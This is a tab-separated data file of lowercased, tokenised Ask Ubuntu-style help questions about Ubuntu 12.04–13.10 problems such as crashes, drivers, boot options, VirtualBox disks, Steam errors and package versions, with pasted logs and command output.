353449	software-center crashes : bug or configuration error ?	for several weeks , i 've been having trouble with software-center under ubuntu 13.04 . it crashes silently , just a few seconds after execution . after each crash , syslog records a cryptic error : oct 3 23:14:11 mattbuntu kernel : [ 24085.941708 ] traps : software-center [ 20640 ] trap int3 ip:7f9ac3880135 sp:7fffaf98bf60 error:0 software-center emits the following error when executed from the terminal : [ matt @ mattbuntu : ~ ] $ software-center ** ( software-center:4114 ) : warning ** : could n't connect to accessibility bus : failed to connect to socket /tmp/dbus-qorifkntuu : connection refused 2013-10-04 18:18:21,219 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-10-04 18:18:21,991 - softwarecenter.plugin - info - activating plugin ' < module 'webapps_activation ' from '/usr/share/software-center/softwarecenter/plugins/webapps_activation.pyc ' > ' 2013-10-04 18:18:22,001 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/lib/python2.7/dist-packages/gi/importer.py ' , 51 , 'find_module ' ) ' 2013-10-04 18:18:22,000 - root - error - could not find any typelib for launchpadintegration 2013-10-04 18:18:22,062 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) 2013-10-04 18:18:25,068 - softwarecenter.fixme - warning - logs to the root logger : ' ( '/usr/share/software-center/softwarecenter/utils.py ' , 271 , 'get_title_from_html ' ) ' 2013-10-04 18:18:25,068 - root - warning - failed to parse : ' < div style= '' background-color : # 161513 ; width:1680px ; height:200px ; '' > < div style= '' background : url ( '/site_media/exhibits/2013/09/aamfp_leaderboard_700x200_1.jpg ' ) top left no-repeat ; width:700px ; height:200px ; '' > < /div > < /div > ' ( 'ascii ' codec ca n't encode character u'\xa0 ' in position 70 : ordinal not in range ( 128 ) ) 2013-10-04 18:18:25,069 - softwarecenter.ui.gtk3.views.lobbyview - warning - skipping exhibit for : 'u'amnesia-amfp '' not available 2013-10-04 18:18:25,070 - softwarecenter.ui.gtk3.views.lobbyview - warning - skipping exhibit for : 'u'wakfu '' not available ( software-center:4114 ) : gdk-error ** : the program 'software-center ' received an x window system error . this probably reflects a bug in the program . the error was 'baddrawable ( invalid pixmap or window parameter ) ' . ( details : serial 2575 error_code 9 request_code 62 minor_code 0 ) ( note to programmers : normally , x errors are reported asynchronously ; that is , you will receive the error a while after causing it . to debug your program , run it with the gdk_synchronize environment variable to change this behavior . you can then get a meaningful backtrace from your debugger if you break on the gdk_x_error ( ) function . ) trace/breakpoint trap ( core dumped ) i have tried reinstalling the package , but that did not work . any help will be appreciated .
353455	which one to install ?	i have installed ubuntu 12.04 lts but it is too much slower on my computer . i have 256 of ram and 40 gb hard disk . 64 mb graphics . which version of ubuntu should i install on my pc ? ? plz help me..
353457	files manager missing window frame/global menu	i 'm using ubuntu 13.04 . suddenly files manager is missing window frame/global menu . i have checked other application such as gedit , firefox are n't having this problem . i 've tried resetting unity by using these commands : dconf reset -f /org/compiz unity -- reset-icons but the problem still persists . screenshot of the problem : thanks .
353458	can i install ubuntu on my tx97d tablet pc ?	my imuz ( chinese ) tx97d tablet pc is currently running android . i tried to find out how to install ubuntu on it , but i could n't find anything . can i install ubuntu on my tablet ? if yes , how do i install it ?
353459	how to install nvidia-glx package ?	i need to install nvidia-glx package on ubuntu 12.04 , but my system contains ati-graphics card . i want to simulate 3d software aqua3d which needs nvidia-glx package to be installed . can anyone tell me how to install nvidia-glx package and its package version for ubuntu 12.04 ?
353460	how to use sql in terminal ?	i want to create simple tables , insert values in it , and do queries . how to perform them in the terminal ?
353464	how do i pass arguments to a script added to the startup applications ?	i want to start a script on startup , ideally at the end of boot process . to do this , i added it to the list of startup applications using the gui . this is working fine . however , i also want to pass it command line parameters on initialization . i tried adding it into the command itself within startup applications but that does not work . so , how do i pass the parameters on initialization ?
353465	installing ubuntu on dell inspiron 6400	i have a dell inspiron 6400 with windows xp home and i want to know if i can install ubuntu on it . 728ram
353467	how to delete grub	pavanpulapalli @ pavanpulapalli-satellite-c640 : ~ $ dpkg -- list | grep linux-image ii linux-image-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-19-generic 3.8.0-19.30 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-extra-3.8.0-31-generic 3.8.0-31.46 amd64 linux kernel image for version 3.8.0 on 64 bit x86 smp ii linux-image-generic 3.8.0.31.49 amd64 generic linux kernel image pavanpulapalli @ pavanpulapalli-satellite-c640 : ~ $ sudo apt-get purge linux-image-3.8.0.32-genric [ sudo ] password for pavanpulapalli : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-image-3.8.0.32-genric e : could n't find any package by regex 'linux-image-3.8.0.32-genric' pavanpulapalli @ pavanpulapalli-satellite-c640 : ~ $ sudo update-grub2 generating grub.cfg ... found linux image : /boot/vmlinuz-3.8.0-32-generic found initrd image : /boot/initrd.img-3.8.0-32-generic found linux image : /boot/vmlinuz-3.8.0-31-generic found initrd image : /boot/initrd.img-3.8.0-31-generic found linux image : /boot/vmlinuz-3.8.0-19-generic found initrd image : /boot/initrd.img-3.8.0-19-generic found memtest86+ image : /boot/memtest86+.bin done pavanpulapalli @ pavanpulapalli-satellite-c640 : ~ $ sudo apt-get purge linux-image-3.8.0.32-genric reading package lists ... done building dependency tree reading state information ... done e : unable to locate package linux-image-3.8.0.32-genric e : could n't find any package by regex 'linux-image-3.8.0.32-genric' pavanpulapalli @ pavanpulapalli-satellite-c640 : ~ $
353469	help , need to get files from ubuntu 13.04	i recently have had an error occur on my laptop with ubuntu 13.04 , and now it will not connect to usb hdds or network ( wired or wifi ) and blue tooth and every thing i can think off to get my files off will not work.. so i tried booting ubuntu from a usb but it does not see all my files from the faulty intall . and does not find any previously installed operating systems . i have also tried loading the hdd in a machine which has ubuntu 12.04 , but it only mounted a 200ish mb portion of the entire disk . when i load the faulty ubuntu , i can access all my files but it will not load any usb devise for me to back up my things please help ! ! thank you edit ok , got my pc working . using terminal ¨sudo apt-get check¨ it told me dpkg had been interrupted and gave me a command to run , after i ran that command it fixed everything ... so as far as i know i must have shut down the p.c while it was doing updates , and had to resolve the issues this caused . glad i did´t re install and lose all my uni work and photos .
353475	virtual disk size not consistent with /dev/sda1 in virtual box	i am running a oracle virtualbox on my windows machine . created a linux vm with hard disk of capacity ~100g . in settings of virtualbox the virtual disk size is shown as 100 g , but then df -kh ( inside vm ) gives : filesystem size used avail use % mounted on /dev/sda1 5.1g 4.3g 550m 89 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup not sure why it is inconsistent and currently i am running out of disk space . output of fdisk -l /dev/sda is : disk /dev/sda : 8589 mb , 8589934592 bytes 255 heads , 63 sectors/track , 1044 cylinders , total 16777216 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0001a900 device boot start end blocks id system /dev/sda1 * 2048 10938367 5468160 83 linux /dev/sda2 10940414 16775167 2917377 5 extended /dev/sda5 10940416 16775167 2917376 82 linux swap / solaris
353476	ban ip by country in ufw	i want to block a country in my server , but i do n't know which rule i must use in ufw ( or iptables ) . for example , people from us and other countries can see the site , but visitors from russia ca n't . can somebody explain to me how i can ban by country in ufw ? my server details • ubuntu 12.10 • nginx • phpfpm • mysql
353478	how to use airtel 4g lte dongle with ubuntu ?	i have recently installed ubuntu 13.04 in my pc . everything works fine except my airtel 4g lte dongle ( model mf825a ) . ubuntu does not give any option to select 4g lte when setting up a mobile broadband connection . how can airtel 4g lte ( model mf825a ) dongle be used with ubuntu ? are there any patches or other updates available for getting this problem solved ?
353479	crash - every morning , how to resolve this crash and run it in a stable way ?	every day ubuntu 12.04 64-bit on my alienware x51 dell pc crashes . the kernel i am using is 3.2.0-41-generic . i have a python application running which downloads and uploads in the official hours . every single day it crashes with this screen . i am unable to access it remotely , i ca n't ssh to it , nor can i do anything unless i go myself onsite and power off and power on the system . can anyone please advise how to get rid of this daily nightmare crashes ? edit : # lspci | grep vga 00:02.0 vga compatible controller : intel corporation ivy bridge graphics controller ( rev 09 ) # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.2 lts release : 12.04 codename : precise # uname -a linux e700second 3.2.0-41-generic # 66-ubuntu smp thu apr 25 03:27:11 utc 2013 x86_64 x86_64 x86_64 gnu/linux # dpkg -l | grep xserver-xorg-video ii xserver-xorg-video-all-lts-quantal 1:7.7+1ubuntu4~precise1 x.org x server -- output driver metapackage ii xserver-xorg-video-ati-lts-quantal 1:6.99.99~gitf772-0ubuntu1~precise2 x.org x server -- amd/ati display driver wrapper ii xserver-xorg-video-cirrus-lts-quantal 1:1.5.1-0ubuntu2~precise1 x.org x server -- cirrus display driver ii xserver-xorg-video-fbdev-lts-quantal 1:0.4.3-0ubuntu1~precise1 x.org x server -- fbdev display driver ii xserver-xorg-video-intel-lts-quantal 2:2.20.9-0ubuntu2~precise2 x.org x server -- intel i8xx , i9xx display driver ii xserver-xorg-video-mach64-lts-quantal 6.9.3-0ubuntu1~precise2 x.org x server -- ati mach64 display driver ii xserver-xorg-video-mga-lts-quantal 1:1.6.2-0ubuntu1~precise2 x.org x server -- mga display driver ii xserver-xorg-video-modesetting-lts-quantal 0.5.0-0ubuntu1~precise2 x.org x server -- generic modesetting driver ii xserver-xorg-video-neomagic-lts-quantal 1:1.2.7-0ubuntu1~precise1 x.org x server -- neomagic display driver ii xserver-xorg-video-nouveau-lts-quantal 1:1.0.2-0ubuntu3~precise2 x.org x server -- nouveau display driver ii xserver-xorg-video-openchrome-lts-quantal 1:0.3.1-0ubuntu1~precise2 x.org x server -- via display driver ii xserver-xorg-video-r128-lts-quantal 6.9.1-0ubuntu1~precise2 x.org x server -- ati r128 display driver ii xserver-xorg-video-radeon-lts-quantal 1:6.99.99~gitf772-0ubuntu1~precise2 x.org x server -- amd/ati radeon display driver ii xserver-xorg-video-s3-lts-quantal 1:0.6.5-0ubuntu1~precise1 x.org x server -- legacy s3 display driver ii xserver-xorg-video-savage-lts-quantal 1:2.3.6-0ubuntu1~precise1 x.org x server -- savage display driver ii xserver-xorg-video-siliconmotion-lts-quantal 1:1.7.7-0ubuntu1~precise1 x.org x server -- siliconmotion display driver ii xserver-xorg-video-sis-lts-quantal 1:0.10.7-0ubuntu1~precise2 x.org x server -- sis display driver ii xserver-xorg-video-sisusb-lts-quantal 1:0.9.6-0ubuntu1~precise1 x.org x server -- sis usb display driver ii xserver-xorg-video-tdfx-lts-quantal 1:1.4.5-0ubuntu1~precise2 x.org x server -- tdfx display driver ii xserver-xorg-video-trident-lts-quantal 1:1.3.6-0ubuntu2~precise1 x.org x server -- trident display driver ii xserver-xorg-video-vesa-lts-quantal 1:2.3.2-0ubuntu1~precise1 x.org x server -- vesa display driver ii xserver-xorg-video-vmware-lts-quantal 1:12.0.2+git.e5ac80d8-0ubuntu1~precise2 x.org x server -- vmware display driver edit 1 : # ! /bin/bash export display=:0.0 sudo -s # # # repository update software-properties-gtk apt-get update # # # kernel update apt-get install linux-generic-lts-raring linux-headers-3.8.0-30 linux-headers-3.8.0-30-generic linux-headers-generic-lts-raring linux-image-3.8.0-30-generic linux-image-generic-lts-raring update-grub # # # graphics update apt-get install libgl1-mesa-dri-lts-raring libxatracker1-lts-raring xserver-xorg-core-lts-raring xserver-xorg-input-all-lts-raring xserver-xorg-input-evdev-lts-raring xserver-xorg-input-mouse-lts-raring xserver-xorg-input-synaptics-lts-raring xserver-xorg-input-vmmouse-lts-raring xserver-xorg-input-wacom-lts-raring xserver-xorg-lts-raring xserver-xorg-video-all-lts-raring xserver-xorg-video-ati-lts-raring xserver-xorg-video-cirrus-lts-raring xserver-xorg-video-fbdev-lts-raring xserver-xorg-video-intel-lts-raring xserver-xorg-video-mach64-lts-raring xserver-xorg-video-mga-lts-raring xserver-xorg-video-modesetting-lts-raring xserver-xorg-video-neomagic-lts-raring xserver-xorg-video-nouveau-lts-raring xserver-xorg-video-openchrome-lts-raring xserver-xorg-video-r128-lts-raring xserver-xorg-video-radeon-lts-raring xserver-xorg-video-s3-lts-raring xserver-xorg-video-savage-lts-raring xserver-xorg-video-siliconmotion-lts-raring xserver-xorg-video-sis-lts-raring xserver-xorg-video-sisusb-lts-raring xserver-xorg-video-tdfx-lts-raring xserver-xorg-video-trident-lts-raring xserver-xorg-video-vesa-lts-raring xserver-xorg-video-vmware-lts-raring libxrandr-ltsq2 x11-xserver-utils-lts-raring xserver-common-lts-raring apt-get install -- install-recommends xserver-xorg-lts-raring # # # tune sudo apt-get autoremove sudo apt-get autoclean sudo dpkg-reconfigure -a # display nonthing , also show no error sudo dpkg-reconfigure $ ( dpkg -l | awk ' { print $ 2 } ' | grep `` ^xserver '' | tr '\n ' ' ' ) # /usr/sbin/dpkg-reconfigure : xserver-common-lts-quantal is broken or not fully installed update-initramfs -u shutdown -r now edit 2 : second crash shot after applying the changes edit 3 : third crash shot after applying changes
353480	plotting multiple sets of data in libreoffice calc	i 've a question about libreoffice calc . in this link i have multiple sets of data . i want to plot mass vs volume for each one . i need to plot them all on the same chart/graph . i 'd appreciate any help or input you guys have to offer .
353483	libvirt-1.1.1 with xen-4.2.1	i installed xen-4.2.1 from the source and i am using xl toolstack . now i installed libvirt-1.1.1 from the source . it 's not working properly . and i got some error when running the virsh : error : failed to connect to the hypervisor error : no valid connection error : failed to connect socket to '/usr/local/var/run/libvirt/libvirt-sock ' : no such file or directory how do i fix this problem ? could you help me installing libvirt to work with xen ( libxl ) ?
353484	new toshiba satellite pro - ctrl key not working in certain programs	i 've just bought a new laptop ( toshiba satellite pro c50d ) . as a webdesigner , i use the program sublime text and there 's a command to expand codes . this command is ctrl + e. the ctrl key on my laptop is working fine for other uses ( copy/paste for instance ) but in this program it does n't do anything . i know nothing changed in the program itself because i have the same version on my old laptop and ctrl + e is working fine there . what i can do to solve this problem ( instead of using an external keyboard )
353498	ubuntu 13.4 in virtual machine not showing wlan0	i installed ubuntu via virtual box in win8 . if i am connected to the internet with wifi in win8 then i could use internet in ubuntu too . when i type , '' ifconfig '' it does not show `` wlan0 '' . it shows only eth1 and lo . i took editconnection- > add- > wifi but wifi range is not visible ! ! but i am connected ! ! ! how is this ! ! ! i didnt enter the security key in ubuntu then too its connecting ! ! ! in virtual box setting , in usb devices it does n't show wifi or my network adapter . i want to know what is going inside and i want to manually search the wifi range and want to manually enter the security key in ubuntu . how can i do this ? because when i was using ubuntu as dual boot i was using like that . so i am curious to know about it .
353502	is it possible to boot without adding `pci=nomsi` or `acpi=off` to the grub command line ?	i have an asus x64sl laptop with intel core 2 duo p8400 cpu . when i want to boot with linux i have to add to the grub command line either pci=nomsi or acpi=off . is there another way to boot without adding any of these two lines ?
353506	unable to view my login screen and terminal screen	i 'm unable to view my login screen and terminal screen - they 're fully blank . using putty tool remote terminal is working , because if i install wine in my ubuntu 12.04 after restarting my pc , i 'm unable view any screen . does anyone have any ideas ?
353508	build and host my web application on my own private cloud	i have made a private cloud using ubuntu 12.04 lts . i have a maas main server . on that server , i want to host my web application written with java , tomcat and mysql . my maas main server ip address is 192.168.43.191 and dns name is ubuntucloud . so , when i call it from browser like ( http : ubuntucloud ) , i can reach and see `` it 's work . this is the default web page for this server . the web server software is running but no content has been added yet '' sentences . i can call my web application like ( http : ubuntucloud:8080/irmultiagent/ ) while running tomcat server in eclipse . i want to call my web app like ( http : //www.ir_multi_agent/ ) . how to do this ? ps : i omit some `` / '' in my post , because of error
353511	laptop with external second screen and external usb keyboard switch display to mirrored when the laptop keyboard is used	i have a laptop dell with ubuntu 13.04 , i 'm using a second screen plugged in by hdmi ( second screen is a sharp tv ) and a usb keyboard + mice . i usually do n't use the laptop 's keyboard , but whenever i do ( either just for the quick-access button like increasing/decreasing volume or just regular typing ) the display automatically change to mirrored . this is a really annoying behaviour , and i do n't what my display to change until i tell it to , or i plug/unplug a display . is there any way to disable this ?
353512	how to hide top panel in ubuntu desktop	i 'm using ubuntu 13.04 , i want to run my appication in full screen mode , so i want to hide top panel ( indicator ) through terminal command . is there any possibility to do that ?
353516	what unused key combinations are available for use with autokey or other apps ?	i tried setting up a macro using autokey and assigned ctrl+alt+f8 thinking it probably would n't be used for something else . unfortunately it turned my entire screen black except for a cursor in the top left corner ! i found a mention of that function here . where can i find a list of key combinations that are unused ( assuming there are any ) ?
353517	is it possible to install newest version of python via apt-get ?	i started a programming course which requires python 3.3.2 . however , in my ubuntu i can install only version 3.3.1 . is it possible to modify the repositories so that i can install the newest version ?
353522	why is steam not able to connect steam-network ?	this is the output when i try to start steam . it closes with the message `` keine verbindung zum steam-netzwerk möglich ... '' ( no connection to steam-network ... ) removing appcache did n't help so far . running steam on ubuntu 13.04 64-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) unlinked 0 orphaned pipes gtk-message : failed to load module `` overlay-scrollbar '' installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) [ 1004/102851 : warning : proxy_service.cc ( 646 ) ] pac support disabled because there is no > system implementation installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) generating new string page texture 2 : 48x256 , total string texture memory is 49,15 kb generating new string page texture 3 : 256x256 , total string texture memory is 311,30 kb ( steam:12440 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! ( steam:12440 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! ( steam:12440 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! ( steam:12440 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! ( steam:12440 ) : glib-gio-warning ** : g_simple_async_result_complete ( ) called from wrong context ! installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) installing breakpad exception handler for appid ( steam ) /version ( 1370553818_client ) `menu_proxy_module_load ' : /home/ex00r/.local/share/steam/ubuntu12_32/steam : undefined symbol : menu_proxy_module_load ( steam:12440 ) : gtk-warning ** : failed to load type module : ( null ) ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . ( steam:12440 ) : libdbusmenu-glib-warning ** : trying to remove a child that does n't believe we 're it 's parent . roaming config store loaded successfully - 6339 bytes . migrating temporary roaming config store adding license for package 0 adding license for package 11 adding license for package 79 adding license for package 517 adding license for package 1292 adding license for package 2243 adding license for package 2753 adding license for package 3024 adding license for package 4314 adding license for package 4819 adding license for package 8198 adding license for package 8892 adding license for package 11107 adding license for package 11108 adding license for package 11262 adding license for package 13533 adding license for package 14481 adding license for package 17982 adding license for package 32744 adding license for package 32745 adding license for package 32747 generating new string page texture 4 : 128x256 , total string texture memory is 442,37 kb generating new string page texture 5 : 384x256 , total string texture memory is 835,58 kb generating new string page texture 6 : 1024x256 , total string texture memory is 1,88 mb generating new string page texture 7 : 512x256 , total string texture memory is 2,41 mb generating new string page texture 8 : 24x256 , total string texture memory is 2,43 mb unlinked 2 orphaned pipes casynciomanager : 0 threads terminating . 0 reads , 0 writes , 0 deferrals . casynciomanager : 804 single object sleeps , 0 multi object sleeps casynciomanager : 0 single object alertable sleeps , 1 multi object alertable sleeps [ 2013-10-04 10:28:50 ] startup - updater built jun 6 2013 13:48:29 [ 2013-10-04 10:28:50 ] installation wird überprüft ... [ 2013-10-04 10:28:50 ] verification complete shutting down . . . [ 2013-10-04 10:29:08 ] shutdown
353527	ubuntu and full hd display	i recently bought a new 14 inch laptop with full hd screen . as i was expecting after installing windows 8 and ubuntu 13.04 all icons and fonts were rather small and uncomfortable . in windows 8 i found one simple solution - right click on desktop , then click on personalize , then click on display . after that you will be presented with option called change the size of all items . here you can easily increase the size of everything in one click , it is rather nice . in ubuntu i installed unity tweak but there everything is separated . in one place i can increase font size in the other place i can increase icons of launcher . so everything is not coordinated . guys , do you know if ubuntu has some mechanism which will allow me increase the size of everything like in windows 8 ?
353530	onix metadata editor for ubuntu	there is widely used metadata system in book industry called onix for books . basically , onix metadata is just xml file . there are some commercial solutions for windows and mac os x like onix edit or onix suite that have gui for editing such metadata . is there any ubuntu software that allows to edit onix metadata either by gui or command line ?
353532	ca n't install new program from zip file	i 'm new to ubuntu . when i install some new program from a zip file , i get this message and ca n't install it . zipfile is disk 26970 of a multi-disk archive , and this is not the disk on which the central zipfile directory begins ( disk 16752 ) . can someone please help ?
353533	webcam not working in 13.04	i 'm running 13.04 ( 64-bit version ) but my webcam ( microsoft lifecam nx-3000 ) stopped working when i upgraded . i downloaded the 32-bit drivers which fixed it for a while but now it 's not recognised in skype , cheese or vlc . here 's the output of lsusb : bus 001 device 002 : id 045e:0721 microsoft corp. lifecam nx-3000 ( uvc-compliant ) and here 's dmesg | grep uvcvideo : [ 16.552513 ] uvcvideo : found uvc 1.00 device microsoft lifecam nx-3000 ( 045e:0721 ) [ 16.553854 ] uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . [ 16.554225 ] uvcvideo : failed to query ( 129 ) uvc probe control : -32 ( exp . 26 ) . [ 16.554234 ] uvcvideo : failed to initialize the device ( -5 ) . [ 16.554996 ] usbcore : registered new interface driver uvcvideo
353535	how to set proxy in ubuntu when can not rsync some site	i guess firewall block some site , how to set free proxy in ubuntu when can not rsync some site i do not know which proxy are free and how to set it to let rsync to install gap-system
353536	remove persistent devices from file browser list	in my file browser , it lists all the drives and devices available for browsing . there is one that is from another os installation , and i want to remove it from the list . hiding devices using /etc/udev/rules.d/ works for other devices i want to hide , except this one . the uuid for the device is different from the ones for the partitions . $ sudo blkid -shows this device is associated with the device mapper . deleting the link in /dev/mapper/relevant-link-name didnt work because device mapper made another very quickly . how can i hide this device from the file browser ?
353539	where to submit feature ideas when brainstorm.ubuntu . is dead	i had an idea/feature suggest to make for ubuntu . but , as i found out , the site is dead . see : ubuntu brainstorm site down/dead ? . question : where can i make a feature suggest/idea now that brainstorm.ubuntu is no more .
353541	i have ubuntu 13 and i want 12 back ! 13 wo n't boot my ubuntu 12 dvd during resarting	i installed 13 fine with no problems from a dvd , but now that i ca n't get jack to work on here i want 12 back very badly . i have it on a disk but i cant get the newest version of ubuntu to recognize it ... . any help is appriciated
353543	i have problems installing ubuntu 13.04 with wubi on windows xp	i have downloaded an ubuntu-13.04-desktop-i386.iso file , but when i use wubi to install it in a windows xp system , the ubuntu installer program shows : download ubuntu-13.04-desktop-amd64.iso.torrent . it would take about two hours to download it . why does this happen ? it`s a lot of trouble for me .
353545	zfs scrub makes pc shutdown `` work '' : but why and how ?	when shutting down ( and suspending ) my pc automatically reboots . much to my surprise , i noticed that the pc does shut down without reboot when ( native ) zfs is performing a scrub ( apparently the zfs-drive is still available and being shared during scrub ) . anybody got ideas on what is happening inside the scrub process that allows the shutdown ? i would like to know to `` rectify '' my regular shutdown . it 's very annoying that my pc ca n't shutdown in a normal way . suspend keeps on resulting in a reboot despite the scrub , but i 'll leave that for another topic after some more investigation . ubuntu 13.04 , zfs ( 6 disks ) as a nas on a asrock b75 pro3-m , intel pentium g2020 , 16 gb ram , additional pci-e network adapter . many thanks in advance for your help ! kind regards , david .
353547	installing applications temporarily	i am using ubuntu 13.10 . to post some answers i may need to install some applications which i wo n't use much . so i would love to install those apps in way that they are gone after a restart . how can i do this ?
353550	i have just installed ubuntu . but it 's too slow	i have just installed ubuntu 13.04 in my desktop . but it 's running in too slow . please help me ... i installed 'intel-linux-graphic-installer ' and tried to update graphic driver , but it 's failing while update ... hardware details of my system ; processor : intel速 celeron ( r ) cpu 430 @ 1.80ghz ram : 1gb 30 gb space for ubuntu 1gb swap area
353552	transfer ubuntu server 10.04 to another 13.04	i am tottaly new to linux administration and now i have big problem . i have old server with some sites , databases , programs etc that is ubuntu 10.04 . because of too much users i rented new better and faster server but with ubuntu 13.04 . soo my question is : does anyone know easy way to transfer all server data , sites , databases , mail server etc etc on new ubuntu 13.04 server ? my hosting provider will do ip changes when i ask them but i need to transfer everything else alone and they dont provide software supprot : (
353558	i need to track the information of all the laptops which are connected to lan	i am a beginner to the projects . i need to track the information of all the laptops which are connected to lan and should generate reports . how can i do it ? one is ubuntu 12.4 and another is linux mint in virtualbox
353561	no previous os detected when installing ubuntu 13.04	i am able to try ubuntu 13.04 using a live usb . however , when i attempt to install ubuntu ... i am told that no existing os is detected on the hard drive . when i get a new laptop , i do intend to format this one and use it purely for ubuntu . however , in the meantime , i would need the ability to dual boot . i do select the other option , to partition the drive ... from inside windows , i had shrank the c : volume and created a new partition w/ 5gb of space ( for some reason , i could not shrink it any further although i have 90 gb of free space left ) ... in ubuntu , i selected this 5gb volume as reserved bootable bios space . however , when i attempt to continue , i am told that no root file space has been selected . do i need both reserved space for bios and root space ? or should i only use the free 5gb for the root space ?
353570	authentication required by wireless network appears multiple times	sometimes when i do n't use my ubuntu for a long time - maybe a day , i can see the popup showing authentication required by wireless network there 's obviously some wireless connects and disconnects . but the main problem is that sometimes i find tens of these popups , and all of them i need to close manually ( ok , i can write a script , but seriously.. ) is there any configuration to show only one such popup ?
353571	on a samsung np550p5c-s01in , unable to adjust brightness with fn keys after installing nvidia drivers .	the problem came up after installing nvidia graphics driver on my samsung np550p5c-s01in laptop . i 'm currently using ubuntu 13.10
353572	how do i change extensions of all files in a folder to one common extension when all the files have different extensions ?	i have a grader for coci ( a competitive programming contest ) that reads input files ( txt [ number ] .in ) , compiles and runs a code ( txt.cpp ) and matches the result with an output file ( txt [ number ] .out ) . the problem is , coci problem 's input files have format ( txt.in.1 ) , ( txt.in.2 ) , ( txt.in.3 ) etc and similar names for output files . i need to change the extensions of the input files from txt.in . [ number ] to txt [ number ] .in . ( need to do the same for the output files as well ) can anyone help me with this ? i 'm currently using 13.04 ubuntu .
353577	install other desktop managers	now i want to change back to ubuntu but i still do not like the unity desktop , so i was wondering if there are any problems in installing and using gnome 3 or mate as a desktop manager with ubuntu . do i lose any of the functionality ? is there any software that depends on unity to work ?
353588	usb ports not recognizing devices ?	i have a particularly odd problem , that i ca n't seem to solve . i recently just booted ubuntu 12.04 lts to my desktop , the strange thing about it is , that only the usb 3.0 ports on the front recognize my devices . i am stumped i 've looked every where on this forum and others for the answer , and none of them seem to have my specific problem . desktop specifications : x64 bit gigabyte motherboard am3+ socket amd fx 8320 8-core clocked at 3.5 ghz 16 gigabytes of ram 2 gigabytes of vram radeon hd 8500 graphics card 7.1 surround sound card built-in ethernet 10/100 12 usb 2.0 ports 4 usb 3.0 ports i 'm lost as too how my machine wo n't get everything recognized . note : i am running the x64 version
353593	how to change java webstart default browser from firefox to google chrome ?	look at the image ubuntu 64 bit 13.10
353595	low-graphics mode error in 13.04 with no graphics card	when i try to boot my computer , i get this error : '' the system is running in low-graphics mode your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . '' the likely causes like `` installation of wrong drivers , incorrect or invalid lightdm greeters , low disk space , incorrect installation of graphics card like ati and nvidia , incorrect configuration of xorg.conf file while setting up multiple monitors '' are not what is causing this as i have no graphics card . no additional drivers . i freed space too . i reinstalled desktop too . i checked lightdm.config too . it already had 'greeter-session=unity-greeter ' . i did this too . `` sudo apt-get install fglrx sudo reboot '' no idea what this does but this was one of the solutions provided . and this too. '' sudo apt-get update sudo apt-get -d install -- reinstall gdm sudo apt-get remove -- purge gdm sudo apt-get install gdm sudo reboot '' now i have no desktop in failsafe mode in ubuntu . now what do i do ? i have tried the solutions provided for how to fix âthe system is running in low-graphics modeâ error ? . they did n't work .
353596	is there any gtd or todo application that supports both android and ubuntu ?	i am looking for a gtd or todo application for both android and ubuntu that provides following features : can be used simultaneously on both - linux and android with the option of automatic synchronization ? could be shown on the desktop of ubuntu or in the taskbar
353601	install boost version 1.40 from terminal	i am using a server running with ubuntu 12.04 i want to install the boost libraries in it . i know sudo apt-get install libboost-all-dev will make the work done , but it installs the latest version version 1.52 or above . but i need to install the particular version 1.40 as there is a problem in a simulator which i am using for my academic purpose . what is the particular command for that so that i can install the boost libraries along with the other requirements for it like the linking files in particular is there command to select the version like for gcc we can use sudo apt-get install gcc-4.5 thanks in advance
